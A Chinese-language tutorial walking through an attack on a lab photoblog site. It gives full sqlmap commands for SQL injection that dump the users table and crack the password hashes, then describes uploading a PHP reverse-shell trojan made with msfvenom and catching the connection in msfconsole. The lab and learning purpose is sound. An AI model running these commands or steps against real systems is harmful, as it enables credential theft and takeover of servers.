說明:此篇文章(包含演示用的軟件等)僅供學習及交流使用,嚴禁用於其他用途。
我們很多人在登陸網站的時候,都需要輸入用戶名和密碼進行登陸,假入我們沒有用戶名和密碼時,怎么登陸呢?一般常見思路有以下幾種:
1.普通人都知道的:暴力破解。
2.利用網站的漏洞(SQL注入等)。
3.利用服務器上的系統漏洞或者軟件漏洞。
4.社會工程。
在這里,我會對以上幾種常見思路進行演示和說明,當然這一篇講的主要是利用SQL注入 GET型注入漏洞。以下的演示環境我是搭建於虛擬機中,進行演示和測試,稍后我會將測試環境打包放在百度雲上,供有需要的朋友進行下載。
1.使用OWASP ZAP掃描目標網站,查看是否存在相關漏洞。
2.查看是由具有SQL GET類型注入點
3. 使用工具SQLMAP 進行注入測試
(1)爆庫:sqlmap -u "http://192.168.0.212/cat.php?id=3" --dbs
(2)爆表:sqlmap -u "http://192.168.0.212/cat.php?id=3" -D "photoblog" --tables
(3)爆字段名:sqlmap -u "http://192.168.0.212/cat.php?id=3" -D "photoblog" -T "users" --columns
(4)爆數據庫里面的用戶名和密碼:sqlmap -u "http://192.168.0.212/cat.php?id=3" -D "photoblog" -T "users" -C "login,password" --dump
好了等待一會,發現密碼是使用MD5進行保護的,我們並不知道密碼,沒事,繼續等待一會,sqlmap會使用默認的字典進行破解,等待一會,破解完成,得到了我們想要的用戶名和密碼:
然后我們使用得到的用戶名和密碼登陸系統。
進入登陸頁面,輸入相應的用戶名和密碼,Well,登陸成功。
系統登陸成功之后,我們查看是否存在上傳漏洞,在網站上查找一會,我們看到了有上傳圖片的接口,我們對該接口進行測試,發現具有文件上傳權限,並且文件過濾名,沒有包含.PHP文件,因此,我們可以上傳
.PHP的木馬來獲取系統的最高權限。
4.使用msfvenom生產反彈型木馬
5.監聽本地端口,等待反彈木馬的連接
訪問木馬文件,木馬文件,會向我們的TCP端口發起一個連接,從而反向控制服務器。
我們首打開本地監聽端口,等待木馬的反向連接:
這里使用監聽的是msfconsole工具,啟動msfconsole:
設置相關參數,然后啟動監聽
好了,已經建立服務器的反向連接了,可以遠程控制計算機了。